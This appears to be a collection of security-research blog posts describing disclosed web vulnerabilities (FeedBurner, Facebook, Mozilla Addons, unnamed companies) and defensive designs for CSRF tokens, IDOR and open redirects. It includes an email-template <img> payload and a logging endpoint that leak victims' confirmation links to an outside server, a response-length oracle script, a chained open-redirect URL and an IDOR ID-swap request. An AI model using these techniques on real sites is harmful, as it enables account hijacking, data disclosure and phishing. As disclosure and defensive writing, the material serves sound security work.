When The Blind Can See

Hi there! Long time no see!
One of the reasons for our blackout, besides tons of vacations and hours of playing Far Cry on the Xbox, was that we have been very busy exploring new grounds in web & application research. Today we are excited to show you one of those new areas.

We'll go straight to the point: our research in the past couple of months did not focus on XSS and other well-known P1 and P2 vulnerabilities. In fact, we wanted to focus on something new. We wanted to focus on something exciting. You can call us Columbus. But please don't.

So, "out-of-the-box" vulnerabilities. What are they? Well, by my definition, those are vulnerabilities that don't have existing definitions. I mean, these are types of vulnerabilities that have yet to be discovered, or at least yet to be published.
Today’s case-study is exactly one of those exciting new findings.

This time, the research was not company-specific. It was protocol-specific.
What are you talking about?
It's simple. I wasn't looking for vulnerabilities in a certain company. I was looking for logic flaws in the way things are done in the most widely used communication protocols.
Although the research produced some amazing findings in the HTTP protocol, those cannot be shared at the moment. But don't you worry! There is enough to tell about our friend, the SMTP protocol.

In short, SMTP is widely used by millions of web applications to send email messages to clients. The protocol is very convenient and easy to use, and many companies have made it part of their everyday operations: swapping messages between employees, communicating with customers (notifications, etc.) and much more. But the most common use right now for SMTP (or simply for 'sending mail') is to verify user accounts.

One of SMTP's features is that it allows sending stylish, pretty HTML messages. Remember that fact.

When users register with a certain web application, they immediately get an email which requires them to verify themselves, as proof that the email address really belongs to them.

FeedBurner, for example, sends this kind of subscription confirmation email to users who subscribe to a certain feed. The email contains a link with an access token that validates that the email address is indeed used by the client. The email's content is controllable by the feed owner, although it must include a placeholder for the confirmation link: '$(confirmlink)'.

"SMTP allows sending HTML, so let's send XSSs to users and party hard" – not really. Although HTML is supported by SMTP, including malicious JavaScript tags, the web application's XSS audit/sanitizer is responsible for cleaning the HTML that arrives over SMTP before parsing it and rendering it to the viewer.

And that's where I started to think: how can I hijack the verification link that users receive in their mail, without an XSS/CSRF and without, of course, breaking into their mail account? I knew that I could include sanitized, non-malicious HTML code, but I couldn't execute any JS code.

The answer was: Abusing the HTML in the SMTP protocol. Remember that non-malicious HTML tags are allowed? Tags like <a>, <b>, <u>.

In my FeedBurner feed, I simply added to the custom email template (of the subscription confirmation email) the following code:

<a href="https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)">Click here!!!</a>

And it worked. The users received an email with non-malicious HTML code. When they clicked the link, the confirmation link was logged on a server of mine.
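To make the attacker's side concrete, here is a minimal sketch of such a logging endpoint, assuming Python/Flask. The /feedburner_poc/newentry path and the 'p' parameter mirror the PoC link above; everything else is an illustrative assumption, not the original code.

# Minimal logging endpoint sketch (assumed implementation, Python/Flask).
from flask import Flask, request

app = Flask(__name__)

@app.route("/feedburner_poc/newentry")
def log_confirm_link():
    # 'p' carries the victim's $(confirmlink) value from the crafted template.
    with open("confirm_links.log", "a") as f:
        f.write(request.args.get("p", "") + "\n")
    return ""  # an empty 200; the victim sees nothing unusual

if __name__ == "__main__":
    app.run()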

I thought: "Cool, but user interaction is still required. How can I send this confirmation link to my server without any sort of user interaction, and without any JS event?" Well, the answer is incredible. I'll use the one allowed tag that is loaded automatically when the page comes up: <img>!

By simply adding this code to the email template:

<img src="https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)" />

I was able to send the confirmation link to my server, without any user interaction. I abused HTML's automatic image loading mechanism, and the fact that sanitized HTML could be sent over SMTP.

Google did not accept this submission. They said, and they are totally right, that the SMTP mail is sent by FeedBurner with a Content-Type: text/plain header, and therefore it is the email provider's fault that it ignores this header and still parses the HTML, although it is told not to.

But still, this case-study was presented to you to show how everyday, "innocent & totally safe" features can be used to cause great harm.

Tokening The Tokens!

Spring is here!

Hope you guys enjoyed the last days of the winter, because this summer is going to be hot. And I don’t mean the temperature. More details about that later…

Our case-study today sets some ground rules for a new anti-CSRF approach that I have been working on for the past few months. This new approach, or, for the sake of correctness – mechanism, basically catalogs CSRF tokens. Don't freak out! You'll understand it in no time.

First, I must say that I am probably not the first one to think of this approach. During some research I came across the same principles of the token cataloging method I am about to show you.

So, what the hell is token cataloging, you ask? It's simple. This is an anti-CSRF security approach (/policy/agreement/arrangement – call it what you want) where CSRF tokens are separated into different action categories. This means that there will be a certain token type for input actions, such as editing a certain field or inserting new data, and a different type of token for output actions, such as fetching sensitive information from the server, or requesting a certain private resource. These two main token groups will now lead our way to security perfection.

Whenever a user is supplied with a form to fill, he will also be supplied with an input action token – a one-time, about-to-expire token which will only be valid for this specific session user, and will expire x minutes after its creation. This input token is then tied to this specific form's token family, and will only be valid for actions of this family type.

Now, after explaining the "hard, upper layer", let's get down to some examples:

Let’s say we have a very simple & lite web application which allows users to:
a. Insert new posts to a certain forum.
b. Get the name of each post creator & the date of the creation of the post.

Ok, cool. We are allowing two actions: an input one (a), and an output one (b). This means we’ll use two token-families: one for inserting new posts, and the other for getting information about a certain post. We’ll simply generate a unique token for each of these actions, and supply it to the user.

But how are we going to validate the tokens?
This is the tricky part. Saving tokens in the database is a total waste of space, unless they are needed for a long time. Since our new approach separates the tokens into different families, we also use different types of tokens – some tokens should only be integers (long, of course), some should only be characters, and some should be both. When there is no need to save the token for further action, the token should not be kept in a data collection; it should be generated specifically for each user.
What does that mean? It means we can derive tokens from the session user's details, which we already have – we can use his session cookie, we can use his username (obfuscated, of course) and we can mix in some factors in order to generate the token in a unique way, one that can only be 'understood' by our own logic later in the token validation process. No more creating a random 32-char token with no meaning that could be used a trillion times. Each action should have its own unique token.
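To make this less abstract, here is a minimal sketch, assuming Python, of deriving a per-family token from session details with an HMAC instead of storing random strings in the DB. The key, family names and two-minute window are illustrative assumptions.

import hashlib, hmac, time

SERVER_KEY = b"long-random-server-side-secret"
EXPIRY_SECONDS = 120

def make_token(session_id: str, family: str) -> str:
    # Bind the token to the session, the action family and a time slot.
    slot = int(time.time()) // EXPIRY_SECONDS
    msg = f"{session_id}|{family}|{slot}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()

def check_token(token: str, session_id: str, family: str) -> bool:
    # Accept the current and previous slot, so a token lives roughly
    # EXPIRY_SECONDS; nothing is ever written to the database.
    now = int(time.time()) // EXPIRY_SECONDS
    for slot in (now, now - 1):
        msg = f"{session_id}|{family}|{slot}".encode()
        expected = hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()
        if hmac.compare_digest(token, expected):
            return True
    return False

A token issued for the 'input' family simply fails validation when replayed against an 'output' action, because the family is part of the HMAC input. Strict one-time use still needs a small used-token cache; this sketch only covers derivation and expiry.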

“This is so frustrating and unnecessary, why should I do it?”
If you don't care about resubmission of forms, that's OK. But what about anti-brute-forcing, or even anti-DoSing? Remember that each action that inserts data into or fetches data from the DB costs you space and resources. If you don't have the right anti-brute-force or anti-DoS mechanism in place, you will go down.
By validating that each action was originally intended to happen, you will save unnecessary connections to the DB.

If implementing this approach costs you too much, simply implement some of the ideas that were presented here. Remember that using the same type of token to allow different actions may cause you harm & damage. If you don't want to generate a token for each user's unique action, at least generate a token for each user's "general" action type, like output and input actions.

Once Upon A Bit

Today's case-study is pretty short – you are going to get its point in a matter of seconds.
We are going to talk about observation, and about the slight difference between a non-bug and a major security issue.

Every security research requires respectable amounts of attention and distinction. That's why there are no successful industrial automatic security testers (excluding XSS testers) – because machines cannot determine all kinds of security risks. As a matter of fact, machines cannot feel danger or detect it. There is no one way for a security research to be conducted against a certain target. The research parameters differ and vary with the target. Some researches end after a few years, some end after a few days and some end after a few minutes. This case-study is of the last type. The described bug was so powerful and efficient (to the attacker) that no further research was needed in order to reach the goal.

A very famous company, which, among all the outstanding things it does, provides security consulting to a few dozen industrial companies and start-ups, asked us to test its "database" resistance. Our goal was to leak the names of the clients from a certain type of collection – not a SQL-driven one (we still haven't got the company's approval to publish its name or the type of the vulnerable data collection).

So, after a few minutes of examining the queries which pull information from the data collection, I understood that the name of the data row is required in order to perform a certain action on it. If the query issuer (= the user who asks for the information about the row) has permission to see the results of the query – a 200 OK response is returned. If he doesn't – again – a 200 OK response is returned.

At first I thought that this was correct behavior. Whether the information exists in the data collection or not – the same response is returned.
But then, completely by mistake, I opened the response for the non-existent data row in Notepad.

The end of the 200 OK response contained an unfamiliar UTF-8 char – one that shouldn't be there. The response for the non-existent data row was one character longer!

At first, I was confused. Why does the response for a non-existent resource contain a weird character at the end of it?
I was sure that there was JS code which checked the response and drew conclusions from that weird char – but there wasn't.

This was one of the cases where I cannot fully explain the cause of the vulnerability, for a simple reason – I can't see the code behind it.

The company's response, besides total shock at our fast results, was that "apparently, when a non-existent resource is requested from the server, a certain sub-process which searches for this resource in the data collection fires up and encounters a memory leak. The result of the process, by rule, should be an empty string, but when the memory leak happens, the result is a strange character. The same one which is being added to the end of the response."
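For illustration, this is roughly how such a response-length oracle can be scripted, assuming Python's requests library; the endpoint and parameter names are made up, since the real ones can't be disclosed.

import requests

BASE = "https://target.example/query"  # hypothetical endpoint

# Body length of a response for a row we know exists.
baseline = len(requests.get(BASE, params={"row": "known-row"}).content)

def row_exists(name: str) -> bool:
    # Both cases return 200 OK; only the body length tells them apart.
    return len(requests.get(BASE, params={"row": name}).content) == baseline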

Conclusion
Making your code run a sub-process, a thread or, god forbid, an external 3rd-party process is a very bad practice.
I know that sometimes it is more convenient and can save a lot of time, but whenever you are using another process – you cannot fully predict its results. Remember – it can crash, freeze, or be force-closed by the OS or by some other process (an antivirus?).
If you must use a thread or sub-process, at least do it responsibly – check that the OS memory isn't full, validate the arguments that you pass to the process, its permission to run, and its possible result scenarios. Don't ever allow the process to run or execute critical commands based on user input.
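Here is a short sketch of that advice, assuming Python: a whitelisted argument, a fixed argument list (no shell), a timeout, and a plan for every failure mode of the child process. The indexer binary and targets are made up.

import subprocess

ALLOWED_TARGETS = {"reports", "exports"}  # whitelist, never raw user input

def run_indexer(target: str) -> str:
    if target not in ALLOWED_TARGETS:
        raise ValueError("unexpected target")
    try:
        result = subprocess.run(
            ["/usr/local/bin/indexer", "--dir", target],  # fixed argv, no shell=True
            capture_output=True, text=True, timeout=30, check=True)
    except (subprocess.TimeoutExpired, subprocess.CalledProcessError):
        return ""  # the child crashed, hung or failed; degrade gracefully
    return result.stdout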

Knocking the IDOR

Are you following FogMarks?

Hello to you all.

Sorry for the no-new-posts November; FogMarks has been very busy exploring new fields and worlds. But now – we're on, baby!

Today's case-study is about an old case (and by old I mean 3 months old), but due to recent developments in an active research of a very well-known company's very well-known product, I would like to present and explain the huge importance of an anti-IDOR mechanism. Don't be afraid, we're not biting.

Introduction

Basically, an IDOR (Insecure Direct Object Reference) allows an attacker to mess around with an object that does not belong to him. This could be users' private credentials, like an email address; a private object that the attacker should not have access to, like a private event; or public information that should simply and rationally not be changed by a 3rd person, like a user's title (don't worry – a case-study about the Mozilla vulnerability is on its way).

When an attacker is able to mess around with an object that does not belong to him, the consequences might be devastating. I am not talking just about critical information disclosure that could bring the business to the ground; I am talking about messing around with objects in ways that could let the attacker execute code on the server. Don't be so shocked – it is very much possible.

From IDOR to RCE

I'm not going to disclose the name of the company or software in which this serious vulnerability was found. I am not even going to say that this is a huge company with a QA and security response team that could fill an entire mall.
But I am going to tell you how an IDOR became an RCE on the server, without violent graphic content of course. For Christ's sake, children might be reading these lines!

Ideally speaking,
An IDOR is prevented using an Anti-IDOR Mechanism (AIM). We at FogMarks developed one a few years ago, and, knock on wood, none of our customers has ever dealt with an IDOR problem. Don't worry, we're not going to try to sell it to you. This mechanism was created only for two large customers who shared the same code base. Create your own mechanism with the info below, jeez!
But seriously, AIM's main goal is to aim the usage of a certain object only at the user who created it, or has access to it.

This is done by keeping a database table especially for sensitive objects that could be targeted from web clients.
When an object is inserted into the table, the mechanism generates a special 32-character identifier for it. This identifier is only used by the server, and it is called the SUID (Server Used ID). In addition, the mechanism issues a 15-digit integer identifier for the client side that is called, of course, the CUID (Client Used ID). The CUID integer is derived from part of the 32-character SUID and part of the object's permanent details (like its name – if the name cannot be changed afterwards) using a special algorithm.

In the users' permissions table there is also a list of nodes that contains the SUIDs of the objects the user has access to.

When the user issues a request from the client side (from the JS – a simple HTTP request: POST/GET/OPTIONS/DELETE/PUT…), the CUID is matched against the SUID – the algorithm tries to regenerate the SUID from the supplied CUID. If it succeeds, it then tries to match the generated SUID against the SUIDs list in the user's permissions table. If it matches, the requesting user gets one-time, limited access to the object. This one-time access is enabled for x minutes and for one static IP, until the next CUID-to-SUID matching process.
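Since the original AIM code can't be published, here is a rough Python sketch of the SUID/CUID idea; the derivation "algorithm" (an HMAC over the SUID and a permanent detail) is my stand-in assumption, not the real one.

import hashlib, hmac, secrets

KEY = b"server-side-secret"

def new_suid() -> str:
    return secrets.token_hex(16)          # 32-char server-only identifier

def cuid_for(suid: str, permanent_name: str) -> int:
    mac = hmac.new(KEY, f"{suid}|{permanent_name}".encode(), hashlib.sha256)
    return int(mac.hexdigest()[:12], 16)  # up-to-15-digit client-side integer

def grant_access(cuid: int, user_suids: dict) -> str:
    # user_suids maps permanent_name -> SUID from the user's permissions row.
    for name, suid in user_suids.items():
        if cuid_for(suid, name) == cuid:
            return suid                   # matched: allow one-time access
    return ""                             # no match: deny

A spoofed CUID fails because it cannot be regenerated from any SUID the requesting user actually has access to.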

This whole process, of course, is managed by only one mechanism – the AIM. AIM handles requests as a queue, so when dealing with many hundreds of requests AIM might not be the perfect solution (due to possible object changes by 2 different users).

In conclusion, in order to keep your platform free of IDORs, requests to access sensitive objects should be managed by one mechanism only. You don't have to copy our exact logic and compile two different identifiers for the same object, but if you'd like to prevent IDORs from the first moment (simple ID spoofing), our proposed solution is the way to go.

FogMarks has found more IDORs like these in some very popular companies' products (and they were patched, of course).

Jumping Over The Fence

Are you following FogMarks?

“Fences were made to be jumped over” – John Doe

As you might have already guessed (or not), today's case-study is about open redirects.

I have already shared with you my thoughts about open redirects and their consequences on the website’s general security.
Now it is time to demonstrate how open redirects can be achieved by manipulating the AOR (Anti Open Redirects) mechanism.

A great example of a great AOR is, again, Facebook's linkshim system. It basically attaches an access token to every URL posted on Facebook.
That access token is personal, so only the user currently viewing the link can click it and be redirected to its destination; others can't. In addition, the linkshim mechanism checks the destination for the user and prevents the user from being redirected to a malicious website. Yes, pretty cool.

Well, until now the sun is shining and we are all having fun at the beach. Hand me that beer, would you?
But what happens when the AOR mechanism, the same one that we trust so much, is being manipulated to act differently?
That’s exactly what we are going to witness today.

Sadly, most websites that use an AOR only manage the links posted to them if those links point to 3rd-party websites. Which means that if I am on the website x.com and I post a link to the website y.com, the link will appear this way on x.com: x.com/out?url=y.com&access_token=1asd2ad6fdC

But if I post a link to the same domain (post x.com/blabla on x.com), the link will appear as is: x.com/blabla

This happens because websites trust themselves to redirect users within themselves. They think it is 'safe' and 'pointless' to attach an access token to a link that redirects the user to the same domain. And you can agree with them, like many do. I have heard the argument 'if a certain page is vulnerable to an open redirect there is no reason to check redirection to it' countless times. But now I'm about to change that once and for all.

A very popular designs website, whose name I can't reveal because there are a few more vulnerability checks to perform on it, had this exact vulnerability.

The site allowed "inner links" to be redirected without any access token or validation, but required the referrer to be the same domain. Pretty smart. But the AOR mechanism allowed any inner link to be redirected, as long as its domain was the site's main domain.
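To make the flaw concrete, here is a hedged Python reconstruction of such a check; the real implementation was of course never disclosed.

from urllib.parse import urlparse

def aor_allows(url: str, referrer: str) -> bool:
    host = urlparse(url).hostname or ""
    ref_host = urlparse(referrer).hostname or ""
    # The flaw: *any* host under x.com is trusted, including mail.x.com,
    # as long as the request came from x.com itself.
    return (host == "x.com" or host.endswith(".x.com")) and ref_host == "x.com"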

Using domain enumeration software I was able to detect a subdomain of the website that hosted a mail service for the company's employees, and that mail service had an open redirect vulnerability on its logout page – even if the user was not logged in, when the logout page was accessed with a 'redirect after' GET parameter, the user was redirected to any other page, even one on a 3rd-party website.

Now that I have an open redirect on a subdomain page, how can I make it rain from the main domain?

Well, the answer was quite easy – I'd simply use the logic flaw of the AOR mechanism to redirect the user to the subdomain and from there to the 3rd-party site.

But there was still a problem – as I said before, the AOR mechanism allowed the link to be redirected to a subdomain, but only if the referrer was the same website. So what did I do?

I simply redirected the user through the same redirect page twice – the first hop made the main domain the referrer, and from there he got redirected again.

Example:
If the 2 vulnerable pages are:
Vulnerable mail service: http://mail.x.com/out?url=y.com
‘Vulnerable’ page within the domain: http://x.com/redirect?to=mail.x.com/out?url=y.com

And since the second page requires the Referer header to be from x.com, I simply issued the following URL:

http://x.com/redirect?to=x.com/redirect?to=mail.x.com/out?url=y.com

That's it. A beautiful example of a simple, easy-to-use logic flaw within an AOR mechanism.


Private Element Gone Public

Are you following FogMarks?

How do you interact with the "private" elements of your users? I mean elements like their name, email address, home address, phone number or any other kind of information that may be important to them.

Today's case-study talks about just that. We will talk about the way private elements (I'll explain the term 'elements' later) should be handled, and then we will see 2 neat examples from vulnerabilities I found on Facebook (which were fixed, of course).

OK, so you are mature enough to ask your users to trust you with their email address, home address and phone number. If you are smart, you'll know that this type of information should be transmitted over the wire via HTTPS, and you'll remember that sometimes it is good practice to encrypt it yourself as well.

But now that the users' info is properly stored, and your system is immune to SQL injection, I would like to introduce you to your next enemy: IDOR.

Insecure Direct Object References are your info's second-worst enemy (after SQLi, of course). An attacker who is able to access other users' private elements (such as email address, phone number, etc.) could basically expose all of the private data on the server.

This is the time to explain my definition of private elements. User elements are not just the user's phone number, email address, name, gender, sexual orientation or favorite side of the bed. They are also elements that the user creates or owns, like the items in the user's cart, a group that the user owns or a painting that a user makes.

The best way to handle private elements is to define them as private and treat them with the needed honor.

If you know that only a certain user (or users) should be able to access a certain element, make sure that only those users' IDs (or other identifiers) are able to access and fetch the element.

How will you do that? Using a private elements manager, of course.
The idea is simple: one class that fetches information about private elements only if an accepted identifier is provided (for example, a class that returns the email address of user ID '212' only if the ID of the user who requested that information is '212').
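A minimal sketch of such a manager, assuming Python (the names and storage layer are illustrative):

class PrivateElementsManager:
    def __init__(self, db):
        self.db = db  # any storage that records an owner per element

    def get_email(self, requester_id: int, target_user_id: int) -> str:
        # The identity check lives in ONE place, for every API to reuse.
        if requester_id != target_user_id:
            raise PermissionError("not your element")
        return self.db.fetch_email(target_user_id)

    def get_element(self, requester_id: int, element_id: int):
        element = self.db.fetch_element(element_id)
        if requester_id not in element.allowed_user_ids:
            raise PermissionError("not your element")
        return element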

By sticking to this logic you'll enforce a strong policy that makes all of the APIs interact the same way with the private elements.

Now, our good friends at Facebook apparently forgot to apply this logic to their old mbasic site (mbasic.facebook.com).

I found 2 vulnerabilities which allowed the name of a private (secret) group or event to be disclosed to any user, regardless of the fact that he was not invited to or a member of the group/event. The first vulnerability is hereby presented; the second one is yet to be fully patched (it is in progress these days).

And The King Goes Down


Tokens are great. Well, sometimes.

Today's case-study will discuss the importance of token manager software.
Well, every site which allows login will normally use a token for each of the 'critical' actions it allows users to do. Facebook, for example, automatically adds a token at the end of any link a user provides, and even their own links! This mechanism is called 'Linkshim' and it is the primary reason why you never hear about Facebook open redirects, CSRFs or clickjacking (yeah, yeah, I know they also simply don't allow iframes to access them; I'll write a whole case-study about that in the near future).
Facebook's method is pretty simple – if a link is added to the page, add a token at the end of it. The token, of course, should only allow the same logged-in user to access the URL, and there should be a token count to restrict the number of times a token can be used (hint: only once).

But what happens when tokens are managed the wrong way?

A very famous security company, which still hasn't allowed us to publish its name, allowed users to create a team. When a user creates a team, he is the owner of the team – he has the 'highest' role, and he basically controls the whole team's actions and options – he can change the team's name, invite new people to the team, change roles of people in the team and so on.

The team offers the following roles: Owner, Administrator and some other minor, non-important roles. Only the owner and administrators of the team are able to invite new users to the team. An invitation can be sent only to a person who is not on the team and does not have an account on the company's website. When the receiver opens the mail he is redirected to a registration page of the company, and then added to the team with the role the Owner/Admin set.

When I first looked at the team options I noticed that after the owner or an admin invites other people to the team via email, he can resend the invitation in case the invited user missed it or deleted it by accident. The resend option was a link at the side of each invitation. Clicking the link created a POST request to a certain 'invitation manager' page, and passed it the invitation ID.

That's where I started thinking. Why pass the invitation ID as is? Why not obfuscate it, or at least use a token for some sort of validation?

Well, that's where the gold is, baby. Past invitation IDs were not deleted. That means that invitations that had already been approved were still present in the database, and still accessible.

By changing the passed invitation ID parameter to the 'first' invitation ID – the Owner's – it was possible to resend an invitation to him.
At first I laughed and said 'Oh well, how much damage could it do besides spamming the owner a bit?'. But I was wrong. Very wrong.

When the system detected that an invitation to the owner was sent, it removed the owner from his role. But there's more – remember I said that sending an invitation sends the receiver a registration page according to his email address? The system also wiped the owner's account – his private details, and most importantly – his credentials. This caused the whole account of the owner to be blocked. A classic DoS.

So how can we prevent unwanted actions from being performed on our server? That's kind of easy.
First, let's attach an authenticity token to each action. The authenticity token must be generated specifically and individually for each user.
Second, like milk and cheese – let's attach an expiration date to the token. A 2-minute expiration is a fair time to allow our token to be used.
And last, let's delete used tokens from the accessible tokens store. A token should be used only once. If a user has a problem with that – generate a few tokens for him.
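Putting those three rules together, here is a compact sketch, assuming Python; the in-memory dict stands in for whatever server-side store you use (Redis with a TTL, for example).

import secrets, time

EXPIRY = 120  # rule 2: two minutes

class ActionTokens:
    def __init__(self):
        self.store = {}  # token -> (user_id, action, expires_at)

    def issue(self, user_id: int, action: str) -> str:
        token = secrets.token_urlsafe(32)    # rule 1: per-user, per-action
        self.store[token] = (user_id, action, time.time() + EXPIRY)
        return token

    def consume(self, token: str, user_id: int, action: str) -> bool:
        entry = self.store.pop(token, None)  # rule 3: one use, then gone
        if entry is None:
            return False
        t_user, t_action, expires_at = entry
        return t_user == user_id and t_action == action and time.time() < expires_at

Had the invitation manager consumed a token like this on every resend, replaying an old invitation ID would have been rejected outright.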

In conclusion,
this case-study presented a severe security issue that was discovered in the code of a very famous security company.
The security issue could have been prevented by following three simple principles: 1) attaching a token to each action that is performed by a user; 2) setting a rational expiration time for each token; 3) and most importantly – correctly managing the tokens and deleting used ones.

Should We Blame The Diet Coke Smuggler?


Everyone uses user-controlled parameters. This is, as far as I'm concerned, the easiest way to create an effective HTTP negotiation process. It means that in order to ease the interaction between the site and the user, the site allows the user to tell it the essential parameters that are needed for the next interaction. Even while this post is being written – after I click 'Publish', a lot of POST parameters will be sent to the server and processed.

As you might have already guessed, today’s case-study will highlight the huge disadvantage of allowing users to ‘tell you what to do’.

Basically, I don't believe in POST or GET. I know it sounds funny or stupid, but when I see that so many security breaches were launched using GET or POST requests, I cannot live with that comfortably. I know that GET and POST are 'just the messenger', and blaming them would be like blaming an innocent person who was used to smuggle diet Coke into a movie theater.

But I think that we all forgot one important thing – GET and POST are not alone. HTTP, especially in its latest version (and the next one), supports other request types. Like what? PUT, DELETE, OPTIONS. Those request types were made for a reason, and almost none of the latest players on the dev market are using them. Why? Because it's not easy, and it's not 'widely used' – an idiotic term I heard a few days ago at a developer conference I attended. People kept explaining that a certain technology should not be used because "it is not widely used, and therefore there is not enough support or security research and maintenance". And again – why exactly shouldn't I use a unique piece of software that no one else does? Why should I count on our security community to alert me whenever software I'm using is breached?

As for HTTP requests, GET and POST are what I call 'deprecated'. Too many companies and too much software use GET and POST requests with dozens of parameters to 'get things done'. This is exactly the reason why XSS vulnerabilities, along with IDORs and CSRFs, are successfully executed – websites use too many parameters, and the developers, at some point, aren't able to track the software's behavior under all conditions – from general use by a client to an aggressive security research by professionals. That's just the way it is. Another reason for security breaches is that websites count on the user returning the parameters they expect; if the user returns only some of the parameters, the server-side actions that depend on the missing parameters are never executed, resulting in a security vulnerability.

Now, should we cry and bury GET and POST? No. Of course there is a way to keep using GET and POST and still be safe. All you have to do is not blame the diet Coke smuggler, and follow these 5 rules:

  1. Minimize the number of parameters that are used. More parameters = more possibilities for security breaches.
  2. Know exactly the purpose of each parameter.
  3. Know exactly what type of data each parameter should hold.
  4. Know what happens when each parameter is given the wrong type of data, or is MIA.
  5. And the most important thing – use all of the parameters! I can't count the number of times a security breach was successfully launched because not all of the parameters were actually used. In fact, I'm writing another case-study these days about a Facebook security vulnerability involving just that. A minimal validation sketch follows this list.
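Here is that sketch, assuming Python – one declared schema per endpoint, unknown parameters rejected, missing ones never silently skipped (the parameter names are illustrative):

EXPECTED = {           # rules 2 & 3: each parameter's purpose and type
    "post_id": int,
    "title": str,
    "body": str,
}

def validate(params: dict) -> dict:
    unknown = set(params) - set(EXPECTED)
    if unknown:
        raise ValueError("unexpected parameters: %s" % unknown)  # rule 1
    clean = {}
    for name, expected_type in EXPECTED.items():
        if name not in params:
            raise ValueError("missing parameter: %s" % name)     # rules 4 & 5
        try:
            clean[name] = expected_type(params[name])
        except (TypeError, ValueError):
            raise ValueError("bad type for: %s" % name)          # rule 4
    return clean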

To finish, I'll just drop this tiny note: FogMarks is looking nowadays for some new challenges. If you think you can interest us with something, simply DM us on Twitter (and make sure you're following us) or send us an email at contact@fogmarks.com.

Open Redirects – Ups and Downs


A few years ago, when FogMarks was not even a tiny idea or a vision in my head, I used to do casual programming jobs on Fiverr.

One of the jobs/gigs(?) I was asked to do was to cause a user on site x.com to be redirected to Facebook.com and then, without any action on his side, to be redirected to site y.com. I didn't realize back then why someone would want that kind of thing. Why not simply redirect the user directly to y.com?
I asked the person why he would want to do such a thing. His answer changed the way I (and after that, FogMarks) treated and took care of open redirects. He answered that by forcing a user to come from a Facebook URL, the ad engines on y.com pay much, much more, because a popular site like Facebook is redirecting users to y.com.

Until this answer I treated open redirects as simple security issues that can't hurt that much. I knew that an innocent user can get a link of the type innocent.com?redirect_out=bad.com, but I believed that anyone with a little common sense would see such things going on. Those kinds of attacks are mostly used by phishing websites, to try and simulate the domain of innocent.com.

After this long introduction, I want to present today's topic – the solution to open redirects. Facebook did it with their Linkshim system, but I want to introduce a much simpler solution that any of you can use.

Quick note: who should not adopt this solution? Websites that want their domain to be present in the Referer header.

Well, the usual ways I have seen to prevent open redirects are creating a token (YouTube, Facebook's l.php page), forbidding URLs that don't contain the host of the website, and allowing a user to be redirected only via a POST request.

While creating an exit token is good practice, handling and taking care of this whole system is pretty much a headache. You have more values to store in the DB, and you have to check expiration times, IP addresses and a lot more.

Forbidding URLs that don't contain the host of the website is simply wrong. Websites should allow their users to be redirected to other websites, not only to pages within themselves.

And allowing a user to be redirected only after he clicks on a button, for example, isn't always that convenient – for you or for the user.

The Golden Solution
Honestly, the first thing you're about to say is: "What? This guy is crazy". But the next thing will be: "Okay, I should give that a try".
Well, a lot of websites today offer free URL shortening services. In addition to that – they offer a free, modular & convenient API.
Why not use them?!

Instead of carefully creating an exit token, forbidding outside redirects or requiring POST, simply translate any outside URL into a shortened URL that a certain service provides. If you don't want third-party services to store your information, build one of your own using an open-source system.

That way – you won't have to worry about open redirects – they won't occur from your domain.

Let's say you have a page called 'redirect_out.php' with an r GET parameter that a user can supply:

my.com/redirect_out.php?r=http://bad.com

Accept the bad.com URL from the user, automatically translate it to a shorte.nd/XxXxX URL, and then allow the redirection.
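A sketch of the whole idea, assuming Python/Flask and a made-up shortening API (the shorte.nd endpoint below is hypothetical; swap in your provider's real API, or your own open-source shortener):

import requests
from flask import Flask, redirect, request

app = Flask(__name__)

def shorten(url: str) -> str:
    # Hypothetical API: POST the long URL, get a short one back.
    r = requests.post("https://shorte.nd/api/create", json={"url": url}, timeout=5)
    return r.json()["short_url"]

@app.route("/redirect_out.php")
def redirect_out():
    target = request.args.get("r", "/")
    # Outside links never leave directly from our domain.
    return redirect(shorten(target))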

Extra: benefits of using a well-known shortening service
As mentioned before, this solution is offered only to developers who don't want their domain to show up as the referrer. If you're worried about phishing attacks, that's a different scenario. Still, by using a well-known shortening service which maintains a blacklist of known "bad domains" you'll win twice:

  • Your domain will not be the one that redirected users to 'bad' websites (yes, Google knows and checks that too)
  • You'll increase the phishing protection level of your website. Your users can still be sent toward 'bad' websites, but the shortening service will deny the redirect, or at least warn those users (and potentially you).


How Private Is Your Private Email Address?


After reading some blog posts about Mozilla's Addons website, I was fascinated by this Python-based platform and decided to focus on it.
The XSS vector led basically nowhere. The folks at Mozilla did an excellent job properly sanitizing every user input.

This led me to change my direction and search for the most fun vulnerabilities – logic flaws.

The logic flaws logic
Most people don't know this, but the fastest way to track logic issues is to see things logically. That's it. Look at a JS function – would you write the same code? What would you have changed? Why?

Mozilla's Addons site has a collections feature, where users can create a custom collection of their favorite addons. That's pretty cool, since users can invite other users to a role on their collection. How, you ask? By email address, of course!

A user types in the email address of another user, an AJAX request is made to an 'address resolver', and the ID of the user who owns this email address is returned.

When the user presses 'Save Changes', the just-arrived ID is passed to the server and then translated back into the email address, shown next to the user's username. Pretty weird.

So, if the logic, for some reason, is to translate an email to an ID and then the ID back to the email, we can simply interrupt this process in the middle and replace the generated ID with the ID of another user.
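A hypothetical reproduction of that swap, assuming Python's requests; the endpoint and field names are made up, since the real ones weren't published.

import requests

session = requests.Session()
session.cookies.set("sessionid", "attacker-session-cookie")

# The 'address resolver' turned an email we own into our own ID; instead of
# sending that ID back on 'Save Changes', we send someone else's ID.
victim_id = 212
resp = session.post(
    "https://addons.mozilla.org/collections/1234/edit",  # made-up path
    data={"role_user_id": victim_id, "role": "viewer"})
# The saved page then renders the victim's ID back as his email address.
print(resp.status_code)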

The following video presents a proof of concept of this vulnerability, which exposed the email address of any addons.mozilla.org user.

Final Thoughts
It is a bad practice to do the same operation twice. If you need something to be fetched from the server, fetch it once and store it locally (HTML5 localStorage, a cookie, etc.). This simple logic flaw jeopardized hundreds of thousands of users until it was patched by Mozilla.

The patch, as you guessed, was to send the email address to the server, instead of sending the ID.